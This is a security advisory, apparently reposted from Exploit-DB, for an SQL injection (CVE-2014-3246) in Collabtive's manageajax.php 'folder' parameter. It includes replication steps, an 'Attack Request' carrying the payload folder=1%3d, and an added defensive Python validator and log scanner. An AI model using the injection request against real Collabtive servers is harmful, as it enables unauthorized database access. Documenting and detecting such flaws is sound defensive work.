Collabtive 1.2 – SQL Injection

  • Author: Deepak Rathore
    Date: 2014-05-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33249/
  • Vulnerability title: SQL Injection / SQL Error message in Collabtive
    application (CVE-2014-3246)
    CVE: CVE-2014-3246 (coordinated with
    Vendor: Collabtive
    Product: Collabtive (Open Source Project Management Software)
    Affected version: 1.12
    Fixed version: 2.0
    Reported by: Deepak Rathore
    Severity: Critical
    URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482
    Affected Users: Authenticated users
    Affected parameter(s): folder
    
    Issue details: The folder parameter appears to be vulnerable to SQL
    injection attacks. The payload 1%3d was submitted in the folder parameter,
    and a database error message was returned. You should review the contents
    of the error message, and the application's handling of other input, to
    confirm whether a vulnerability is present. The database appears to be
    MySQL.
    
    HTTP request:
    GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
    Host: collabtive.o-dyn.de
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
    Firefox/29.0
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.6.0.3
    Referer:
    http://xxx/managefile.php?action=showproject&id=2482
    Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
    PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
    Connection: keep-alive
    
    Steps to replicate:
    1. Log in to the application
    2. Go to the "Desktop" tab and click on "Add project"
    3. Fill in the project details in the project form and click on the "Add" button
    4. After creating a project, go to the "Files" tab and intercept the request
    5. In the request to "manageajax.php", replace the "folder" parameter value with "1%3d"
    =====================
    Original Request
    =====================
    GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1
    Host: collabtive.o-dyn.de
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
    Firefox/29.0
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.6.0.3
    Referer:
    http://xxx/managefile.php?action=showproject&id=2482
    Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
    PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
    Connection: keep-alive
    ======================
    Attack Request
    ======================
    GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
    Host: collabtive.o-dyn.de
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
    Firefox/29.0
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.6.0.3
    Referer:
    http://xxx/managefile.php?action=showproject&id=2482
    Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
    PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
    Connection: keep-alive
    ======================
    6. Forward the manipulated request to the server and wait for the response in the browser
    7. The SQL error message is the proof of the vulnerability.
    
    Tools used: Burp Suite proxy, Mozilla Firefox browser
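    The advisory shows that `folder` is expected to be a plain integer (the original request sends `folder=0`) but that the endpoint accepts arbitrary text and passes it to MySQL. The following added example is not Collabtive's code and not part of the advisory; it illustrates, from the defender's side, the two checks a practitioner would want for this class of issue: a strict integer validator that a hypothetical fix would apply to `id` and `folder` before any query is built, and a scanner that flags requests to `manageajax.php` in access logs whose `id`/`folder` values are not integers. The log lines are constructed for the example, and the `validate_int_param` / `find_suspicious_requests` names are the example's own.

```python
"""Added example for the Collabtive `folder` SQL injection advisory.

Not Collabtive code. Provides:
  1. validate_int_param(): the strict integer check a hypothetical fix would
     apply to `id` and `folder` before they reach a database query;
  2. find_suspicious_requests(): scans combined-format access-log lines for
     manageajax.php requests whose `id`/`folder` values fail that check.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters of manageajax.php that the advisory shows carrying integer values.
NUMERIC_PARAMS = ("id", "folder")

# Apache/nginx "combined" log format; only the fields this example uses are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample lines (not from any real server): the first mirrors the
# advisory's "Original Request", the second its "Attack Request" (folder=1%3d),
# the third is another benign request, the fourth is a different endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [08/May/2014:10:00:01 +0000] "GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1" 200 512
203.0.113.5 - - [08/May/2014:10:00:09 +0000] "GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1" 200 1873
198.51.100.7 - - [08/May/2014:10:01:30 +0000] "GET /manageajax.php?action=fileview_list&id=2482&folder=7 HTTP/1.1" 200 498
198.51.100.7 - - [08/May/2014:10:02:00 +0000] "GET /managefile.php?action=showproject&id=2482 HTTP/1.1" 200 4210
"""


def validate_int_param(value):
    """Return the integer if `value` is a plain non-negative decimal string,
    otherwise None.

    Hypothetical hardening: a value such as "1=" (the URL-decoded form of
    1%3d) is rejected here, so it never reaches the SQL layer at all.
    """
    if value is None or not re.fullmatch(r"[0-9]{1,10}", value):
        return None
    return int(value)


def find_suspicious_requests(log_text):
    """Return a list of (client_ip, param_name, decoded_value) for requests
    to manageajax.php whose id/folder values are not plain integers."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/manageajax.php"):
            continue
        # parse_qs percent-decodes values, so "1%3d" arrives here as "1=".
        params = parse_qs(url.query, keep_blank_values=True)
        for name in NUMERIC_PARAMS:
            for value in params.get(name, []):
                if validate_int_param(value) is None:
                    hits.append((m.group("ip"), name, value))
    return hits


if __name__ == "__main__":
    for ip, name, value in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: non-integer {name}={value!r} sent to manageajax.php")
```

Running the block against the constructed log reports only the second line (`folder` decoded to `1=`), which is exactly the request the advisory uses as proof. The validator deliberately accepts nothing but decimal digits rather than trying to strip SQL metacharacters; in the real fix the validated integer would then be bound as a prepared-statement parameter, which is the step this example does not cover.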